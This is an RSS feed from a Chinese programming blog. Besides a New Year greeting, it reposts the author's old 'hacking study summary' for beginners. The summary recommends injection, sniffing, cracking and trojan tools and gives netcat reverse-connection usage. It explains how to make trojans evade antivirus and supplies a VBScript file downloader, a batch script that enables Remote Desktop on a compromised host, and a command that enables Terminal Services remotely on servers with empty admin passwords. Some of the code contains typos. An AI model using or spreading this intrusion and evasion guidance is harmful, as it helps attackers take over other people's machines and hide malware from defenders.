﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>C++博客-聚星亭-随笔分类-心情日志</title><link>http://www.cppblog.com/boatcjz/category/8700.html</link><description>吾笨笨且懒散兮 急须改之而奋进</description><language>zh-cn</language><lastBuildDate>Thu, 01 Jan 2009 06:03:32 GMT</lastBuildDate><pubDate>Thu, 01 Jan 2009 06:03:32 GMT</pubDate><ttl>60</ttl><item><title>新年快乐</title><link>http://www.cppblog.com/boatcjz/archive/2009/01/01/70892.html</link><dc:creator>美丽の破船</dc:creator><author>美丽の破船</author><pubDate>Wed, 31 Dec 2008 16:13:00 GMT</pubDate><guid>http://www.cppblog.com/boatcjz/archive/2009/01/01/70892.html</guid><wfw:comment>http://www.cppblog.com/boatcjz/comments/70892.html</wfw:comment><comments>http://www.cppblog.com/boatcjz/archive/2009/01/01/70892.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cppblog.com/boatcjz/comments/commentRss/70892.html</wfw:commentRss><trackback:ping>http://www.cppblog.com/boatcjz/services/trackbacks/70892.html</trackback:ping><description><![CDATA[新年到了~~~<br><br>在这新年的第一时间，祝福所有关心过我，帮助过我的朋友：<br><br>天天快乐，，万事如意<br><br>工作顺心，，学习进步<br><br>平平安安，，幸福美满！<br>
<img src ="http://www.cppblog.com/boatcjz/aggbug/70892.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cppblog.com/boatcjz/" target="_blank">美丽の破船</a> 2009-01-01 00:13 <a href="http://www.cppblog.com/boatcjz/archive/2009/01/01/70892.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>黑客技术学习小结-（遗失，后补……）</title><link>http://www.cppblog.com/boatcjz/archive/2008/11/25/67829.html</link><dc:creator>美丽の破船</dc:creator><author>美丽の破船</author><pubDate>Tue, 25 Nov 2008 10:18:00 GMT</pubDate><guid>http://www.cppblog.com/boatcjz/archive/2008/11/25/67829.html</guid><wfw:comment>http://www.cppblog.com/boatcjz/comments/67829.html</wfw:comment><comments>http://www.cppblog.com/boatcjz/archive/2008/11/25/67829.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cppblog.com/boatcjz/comments/commentRss/67829.html</wfw:commentRss><trackback:ping>http://www.cppblog.com/boatcjz/services/trackbacks/67829.html</trackback:ping><description><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;最近闲着无聊，想找一下成就感&#8230;&#8230;<img src="http://www.cppblog.com/CuteSoft_Client/CuteEditor/images/emembarrassed.gif" align=absMiddle border=0><br></p>
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;把自己的网名给百度了一下！才发现原来我写过这么多乱七八糟的东西！<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;在随便乱翻中，我发现了一篇早就让我抛在脑后的一篇文章&#8230;&#8230;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;这个是我在高中时，记在我学习笔记本上的一篇文字！（当时学校封闭式管理，上网极不方便&#8230;&#8230;）后来一上大学时抄在我第一个博客上的！<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;后来因为我这里是网通线路，上那个网站真的太慢了，就换了地方，这段文字也就被我抛在那个角落里了~~~<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;今天再把它抄到这里了，毕竟是我曾经&#8220;偷学&#8221;的一些收获，也算是一个纪念吧~~~<br>
<fieldset>
<p align=center><legend>黑客技术学习小结</legend><strong><span style="FONT-SIZE: 18pt">黑客技术学习小结</span></strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font size=5>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br><span style="FONT-SIZE: 12pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ------美丽の破船</span></font></p>
<p align=center><font size=5></font>&nbsp;</p>
<p align=left>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;仔细想想，我学习&#8220;网络安全&#8221;已经很长时间了！的确收获不小！虽然以前，高中的学习生活压的喘不过气来，但挤出点时间学习&#8220;网安&#8221;，真是不矣乐乎！<br>&nbsp;&nbsp;&nbsp; &#8220;共享&#8221;是我们的基本精神，可是想想我&#8220;共享&#8221;出来的东西真是少之又少，因此，写出此破烂文章，希望对还没有入门的&#8220;菜菜&#8221;有所帮助！少走些弯路！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;说到&#8220;黑客&#8221;、&#8220;入侵&#8221;很大的一部分就是程序的安全性，无疑这一点要求我们应该多少懂得一点编程知识！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;下面我介绍一下我网安的大体知识、以帮助那些不知道该从何处下手的朋友：<br>&nbsp; <br><font size=5><strong><span style="FONT-SIZE: 14pt">一、使用工具：</span><br></strong></font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;只会用工具的黑客，不是一个好的黑客；但是，一个好的黑客一定会把工具用的出神入化！（比如：魔女の条件：她把一个很普通的RADMIN配置的不得不让人叫绝！！）是的，好的工具配合好的方法及灵活的运用，可以很好的为自己提高声势和信心！下面我介绍一些比较经典的工具，仅供参考：<br><strong>&nbsp;&nbsp;&nbsp; 1、扫描工具：</strong><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （1）SurperScan 特点：扫描的范围广，内容很详细，准确性也可以！尤其是到了3.0以后，更是增加了许多的特色!<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （2）X-SCan：这个可能是一个黑客必备的工具之一了！尤其是它那详尽的报告及漏洞修补建议！无一不体现出它功能的强大！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 还有X-Way，nmap等等这些都比较常用！大家可以都试一下！<br><br><strong>&nbsp;&nbsp;&nbsp; 2、脚本少表攻击程序：<br></strong><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （1）NBSI：这个不用我说了吧！本人推荐（911专用版）感觉真的挺好! 当然最新的版本已经开始支持对JSP的注入了！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （2）Domain：现在出来3.6版了！呵呵，在用法上没有太多的变化！只是对数据库文件作了些补充！大家可以自己用ACCESS打开它，来补充！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （3）HDSI：这个是教主的工具！它以前的版本不是很好，本人推荐用&#8220;安静拓宽版！&#8221;这个不错！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （4）CASI：这个是针对PHP环境的注入工具！功能我就不废话了！本人推荐校盟专用版，要是大家有钱！可以去买正式版。。。<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 至于CGI环境：我就不多说了！毕竟它的发展前景不是很乐观！<br><br>&nbsp;&nbsp;&nbsp; <strong>3、密码及嗅探工具：</strong><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这样的工具比较多！但大家最好还是懂点协议的基础知识！但是好用的就是那么几个：X-Sniffer，SnifferNT，WinSockExpert等，这些工具的用途都很广！如：提COOKIE，分析数据的传输过程，提取用户名，密&nbsp;&nbsp;&nbsp; </p>
<p>码等等，还有一些比较好用的如：CAIN，密码嗅探专家等<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 密码相关的工具也就是破MD5的穷举程序，破解网页密码的如：朔雪等还有破ACCESS的破PUBWIN的破还原精灵还原卡的，至于盗号的木马。。。<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 由于本人比较鄙视这个故，不谈这些！<br><br>&nbsp;&nbsp;&nbsp;<strong> 4、溢出工具</strong><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这可能是黑客工具中最为霸道的程序了！只要根据不同的环境选择相应的工具，就可以了！这里我仅介绍与溢出相关的辅助工具的用法！至于具体的程序，大家可以自己去GOOGLE一下1<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （1）NC.EXE：堪称为瑞士军刀的简易后门程序！主要用于溢出有的网络连接！具体的格式如下；<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 正向连接；nc.exe -vv ip port<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 反向连接；nc.exe -vv -L -p PORT<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （2）TFTPD32.EXE这个我也不用说了吧！如果实在不动大家可以去GOOGLE以下《文件传输方法总结》一文！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （3）MT.EXE；这个也是一个后门程序，游乐他可以完成很多是如；端口转向，克隆帐户、结束进程，替换服务等等1具体的使用方法大家还是去GOOGLE一下吧！<br><br>&nbsp;&nbsp;&nbsp; <strong>5、木马后门程序及相关的一些工具；<br></strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 对于任何一个黑棵而言，这是必需的工具，许多的高手豆油自己的木马程序，而我们这些小菜只能用已经公布出来的随时可能被杀的木马程序了！ </p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这里只提三点建议：<br><em>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （1）不要使用当前正在流行的木马！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （2）我讲一下木马免杀的基本方法！</em><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 当前杀毒软件的查杀病毒的方法主要是病毒码核对，知道了这个我们就可以作相应的改动了！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A：刚拿到一个木马程序我们首先用PEID对它进行查壳！若有壳则脱壳&nbsp; </p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ！大家可以到&#8220;看雪学院&#8221;去找脱壳机1<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; B：脱完壳之后我们就要开始作免杀了！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 作免杀木马的大致方法如下：<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （a）加一个强壳！如北斗压缩、三层驱动SA等等<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （b）加花指令<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 至于花指令的概念大家去GOOGLE一下，应该会有很大的收获的！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （c）使用CCI定律：<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这个其实很简单！用PE EDITOR将木马程序的OEP入口地址加1便可！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; （d）手工定位和修改特征码！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这个需要大家有一定的基础知识！等有时间我会专门的写一篇这方面的文章！当然如果上面的几种方法如果大家能够综合还运用也是很强的！<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (3)我推荐的木马程序：</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; a:冬日之恋：这是一个CMD状态下采用C/S模式的木马后门程序！免杀也比较方便功能更是没的说！</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; b；黑社会：这个其实就是RADMIN的扩展版（增加了反向连接功能）！按照魔女の条件提供的配置方法，木马是及少会被查杀的!而且功能、隐藏性都没的说！当然还有很多！比如：流萤，黑洞，PCSHARE等等<br><br><span style="FONT-SIZE: 14pt"><strong>二、掌握一些常用的命令；</strong></span><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; WINDOWS出台以后，似乎DOS已经离我们很遥远了！但是，DOS的高效性使得我们至今没有能够完全摆脱掉它！比如论坛里还有很多用批处理来理系统垃圾的应用！而且入侵时很大一部分都要用到DOS命令，用到批处理 ！所以DOS命令大家都是要了解的！关于DOS的具体细节，我等以后作为具体的章节为大家讲解！<br><br><span style="FONT-SIZE: 14pt"><strong>三、灵活的脚本攻击：<br></strong></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这个概念比较大！也是当今流行了很长一段时间的攻击技术！因为脚本的范围比较广，大家可以直接利用别人已经写好的程序为我所用（如：Iget.vbs等）当然如果要想真正的用好脚本这一利器，还得自己学好脚本程序！（如：HTML、VBScript、JAVAScript、ASP、PHP等）不要被这么多的语言吓到！其实我们只要将一部分学好便可！大约两个月应该可以搞定!学好这一些对我们以后真正的理解脚本攻击，理解注入、理解跨站、理解COOKIE欺骗等都有很大的帮助！<br>下面我列出几个比较有用的脚本代码：（希望能对大家有所帮助）<br><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1、在CMD环境中下载文件的代码：</strong></p>
<div style="BORDER-RIGHT: #cccccc 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #cccccc 1px solid; PADDING-LEFT: 4px; FONT-SIZE: 13px; PADDING-BOTTOM: 4px; BORDER-LEFT: #cccccc 1px solid; WIDTH: 98%; WORD-BREAK: break-all; PADDING-TOP: 4px; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #eeeeee"><span style="COLOR: #008080">&nbsp;1</span><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top><span style="COLOR: #0000ff">Set</span><span style="COLOR: #000000">&nbsp;xPost&nbsp;</span><span style="COLOR: #000000">=</span><span style="COLOR: #000000">&nbsp;</span><span style="COLOR: #0000ff">CreateObject</span><span style="COLOR: #000000">(</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">Microsoft.XMLHTTP</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">)&nbsp;<br></span><span style="COLOR: #008080">&nbsp;2</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>xPost.Open&nbsp;</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">GET</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">,</span><span style="COLOR: #0000ff">LCase</span><span style="COLOR: #000000">(WScript.Arguments(</span><span style="COLOR: #000000">0</span><span style="COLOR: #000000">)),</span><span style="COLOR: #000000">0</span><span style="COLOR: #000000">&nbsp;<br></span><span style="COLOR: #008080">&nbsp;3</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>xPost.Send()&nbsp;<br></span><span style="COLOR: #008080">&nbsp;4</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top></span><span style="COLOR: #0000ff">Set</span><span style="COLOR: #000000">&nbsp;sGet&nbsp;</span><span style="COLOR: #000000">=</span><span style="COLOR: #000000">&nbsp;</span><span style="COLOR: #0000ff">CreateObject</span><span style="COLOR: #000000">(</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">ADODB.Stream</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">)&nbsp;<br></span><span style="COLOR: #008080">&nbsp;5</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>sGet.Mode&nbsp;</span><span style="COLOR: #000000">=</span><span style="COLOR: #000000">&nbsp;</span><span style="COLOR: #000000">3</span><span style="COLOR: #000000">&nbsp;<br></span><span style="COLOR: #008080">&nbsp;6</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>sGet.Type&nbsp;</span><span style="COLOR: #000000">=</span><span style="COLOR: #000000">&nbsp;</span><span style="COLOR: #000000">1</span><span style="COLOR: #000000">&nbsp;<br></span><span style="COLOR: #008080">&nbsp;7</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>sGet.Open()&nbsp;<br></span><span style="COLOR: #008080">&nbsp;8</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>sGet.Write(xPost.responseBody)&nbsp;<br></span><span style="COLOR: #008080">&nbsp;9</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>sGet.SaveToFile&nbsp;</span><span style="COLOR: #0000ff">LCase</span><span style="COLOR: #000000">(WScript.Arguments(</span><span style="COLOR: #000000">1</span><span style="COLOR: #000000">)),</span><span style="COLOR: #000000">2</span><span style="COLOR: #000000">&nbsp;<br></span><span style="COLOR: #008080">10</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top></span></div>
<p><br>保存为<span style="COLOR: red">iget.vbs</span>便可！<br><strong><u>使用方法：<span style="COLOR: #008000">IGET.VBS&nbsp;&nbsp;&nbsp; 网址&nbsp;&nbsp;&nbsp; 保存的文件名</span></u></strong><span style="COLOR: #008000">&nbsp;&nbsp;<br></span><br><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2、开3389的脚本：（共有两种方法）</strong><br><u>方法1：</u><br></p>
<div style="BORDER-RIGHT: #cccccc 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #cccccc 1px solid; PADDING-LEFT: 4px; FONT-SIZE: 13px; PADDING-BOTTOM: 4px; BORDER-LEFT: #cccccc 1px solid; WIDTH: 98%; WORD-BREAK: break-all; PADDING-TOP: 4px; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #eeeeee"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top><span style="COLOR: #000000">&nbsp;&nbsp;echo&nbsp;[Components]&nbsp;&gt;&nbsp;c:\sql&nbsp;<br><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>&nbsp;&nbsp;echo&nbsp;TSEnable&nbsp;=&nbsp;on&nbsp;&gt;&gt;&nbsp;c:\sql&nbsp;<br><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>&nbsp;&nbsp;sysocmgr&nbsp;/i:c:\winnt\inf\sysoc.inf&nbsp;/u:c:\sql&nbsp;/q&nbsp;</span></div>
<p><br>&nbsp; 编辑好后存为BAT文件，上传至肉鸡，执行。这里值得注意的是要确定winnt是否在c盘，如果在其他盘则需要改动。<br><u>方法2：<br></u><br>&nbsp; (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05<br>地址:www.netsill.com/rots.zip<br>使用方法： <br><br>在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如： </p>
<p><em><u><span style="COLOR: #ff0000">c:\&gt;cscript ROTS.vbs &lt;目标IP&gt; &lt;用户名&gt; &lt;密码&gt; [服务端口] [自动重起选项]</span></u></em> </p>
<p>服务端口： 设置终端服务的服务端口。默认是3389。 <br>自动重起选项： 使用/r表示安装完成后自动重起目标使设置生效。 <br>使用/fr表示强制重起目标。（如果/r不行，可以试试这个） <br>使用此参数时，端口设置不能忽略。</p>
<p>&nbsp;比如扫描到了一个有NT弱口令的服务器，IP地址是222.222.222.222，管理员帐</p>
<p>户是administrator，密码为空 <br>运行CMD（2000下的DOS），我们给它开终端！ <br>命令如下！ <br>cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr <br>上面的命令应该可以理解吧？cscript reg.vbe这是命令，后面的是IP，然后是管</p>
<p>理员帐户，接这是密码，因为222.222.222.222 这台服务器的管理员密码是空的</p>
<p>，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重</p>
<p>启命令（强制重启，一般我都用这个，你也可以/r，这是普通重启） </p>
<p>脚本会判断目标系统类型，如果不是server及以上版本，就会提示你是否要取消</p>
<p>。 <br>因为pro版不能安装终端服务。 <br>如果你确信脚本判断错误，就继续安装好了。 </p>
<p>如果要对本地使用，IP地址为127.0.0.1或者一个点（用.表示），用户名和密码</p>
<p>都为空（用""表示）。 </p>
<p>脚本访问的目标的135端口，如果目标135端口未开放，或者WMI服务关闭，那么脚</p>
<p>本就没用了。&nbsp;<br><br><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;3、列进程的脚本</strong><br></p>
<div style="BORDER-RIGHT: #cccccc 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #cccccc 1px solid; PADDING-LEFT: 4px; FONT-SIZE: 13px; PADDING-BOTTOM: 4px; BORDER-LEFT: #cccccc 1px solid; WIDTH: 98%; WORD-BREAK: break-all; PADDING-TOP: 4px; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #eeeeee"><span style="COLOR: #008080">1</span><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top><span style="COLOR: #000000">WScript.echo</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">PID&nbsp;&nbsp;&nbsp;ProcessName</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000"><br></span><span style="COLOR: #008080">2</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top></span><span style="COLOR: #0000ff">for</span><span style="COLOR: #000000">&nbsp;</span><span style="COLOR: #0000ff">each</span><span style="COLOR: #000000">&nbsp;ps&nbsp;in&nbsp;</span><span style="COLOR: #0000ff">getobject</span><span style="COLOR: #000000"><br></span><span style="COLOR: #008080">3</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>(</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">winmgmts:\\.\root\cimv2:win32_Process</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">).instances_&nbsp;</span><span style="COLOR: #008000">'</span><span style="COLOR: #008000">这里有个空格</span><span style="COLOR: #008000"><br></span><span style="COLOR: #008080">4</span><span style="COLOR: #008000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top></span><span style="COLOR: #000000">Wscript.echo&nbsp;&nbsp;&nbsp;ps.handle</span><span style="COLOR: #000000">&amp;</span><span style="COLOR: #000000">vbtab</span><span style="COLOR: #000000">&amp;</span><span style="COLOR: #000000">ps.name<br></span><span style="COLOR: #008080">5</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top></span><span style="COLOR: #0000ff">next</span></div>
<p><br>将它保存为<span style="COLOR: #ff0000">LIST.VBE</span><br>运行时只要用：<span style="COLOR: #ff0000">cscript list.vbe</span>便可！<br><br><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;4、杀进程的脚本！</strong></p>
<p>&nbsp;</p>
<div style="BORDER-RIGHT: #cccccc 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #cccccc 1px solid; PADDING-LEFT: 4px; FONT-SIZE: 13px; PADDING-BOTTOM: 4px; BORDER-LEFT: #cccccc 1px solid; WIDTH: 98%; WORD-BREAK: break-all; PADDING-TOP: 4px; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #eeeeee"><span style="COLOR: #008080">&nbsp;1</span><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top><span style="COLOR: #000000">&nbsp;&nbsp;</span><span style="COLOR: #0000ff">dim</span><span style="COLOR: #000000">&nbsp;bag,pipe,honker,good<br></span><span style="COLOR: #008080">&nbsp;2</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top><br></span><span style="COLOR: #008080">&nbsp;3</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="COLOR: #0000ff">do</span><span style="COLOR: #000000"><br></span><span style="COLOR: #008080">&nbsp;4</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top><br></span><span style="COLOR: #008080">&nbsp;5</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;good</span><span style="COLOR: #000000">=</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">.</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000"><br></span><span style="COLOR: #008080">&nbsp;6</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top><br></span><span style="COLOR: #008080">&nbsp;7</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="COLOR: #0000ff">set</span><span style="COLOR: #000000">&nbsp;bag</span><span style="COLOR: #000000">=</span><span style="COLOR: #0000ff">getobject</span><span style="COLOR: #000000">(</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">winmgmts:\\</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">&amp;</span><span style="COLOR: #000000">good</span><span style="COLOR: #000000">&amp;</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">\root\cimv2</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">)<br></span><span style="COLOR: #008080">&nbsp;8</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top><br></span><span style="COLOR: #008080">&nbsp;9</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;setpipe</span><span style="COLOR: #000000">=</span><span style="COLOR: #000000">bag.execquery(</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">select&nbsp;*&nbsp;from&nbsp;sin32_process&nbsp;where&nbsp;name=</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">进程名</span><span style="COLOR: #000000">"</span><span style="COLOR: #000000">)</span><span style="COLOR: #000000"><br></span><span style="COLOR: #008080">10</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top></span><span style="COLOR: #000000"><br></span><span style="COLOR: #008080">11</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>&nbsp;&nbsp;&nbsp;</span><span style="COLOR: #0000ff">for</span><span style="COLOR: #000000">&nbsp;</span><span style="COLOR: #0000ff">each</span><span style="COLOR: #000000">&nbsp;i&nbsp;in&nbsp;pipe<br></span><span style="COLOR: #008080">12</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top><br></span><span style="COLOR: #008080">13</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i.terminate()<br></span><span style="COLOR: #008080">14</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top><br></span><span style="COLOR: #008080">15</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="COLOR: #0000ff">next</span><span style="COLOR: #000000"><br></span><span style="COLOR: #008080">16</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top><br></span><span style="COLOR: #008080">17</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top>wscript.sleep&nbsp;</span><span style="COLOR: #000000">1</span><span style="COLOR: #000000"><br></span><span style="COLOR: #008080">18</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top><br></span><span style="COLOR: #008080">19</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top></span><span style="COLOR: #0000ff">loop</span><span style="COLOR: #000000"><br></span><span style="COLOR: #008080">20</span><span style="COLOR: #000000"><img src="http://www.cppblog.com/Images/OutliningIndicators/None.gif" align=top></span></div>
<p>&nbsp;</p>
<p>将它保存为<span style="COLOR: #ff0000">kill.vbs</span>便可用了!</p>
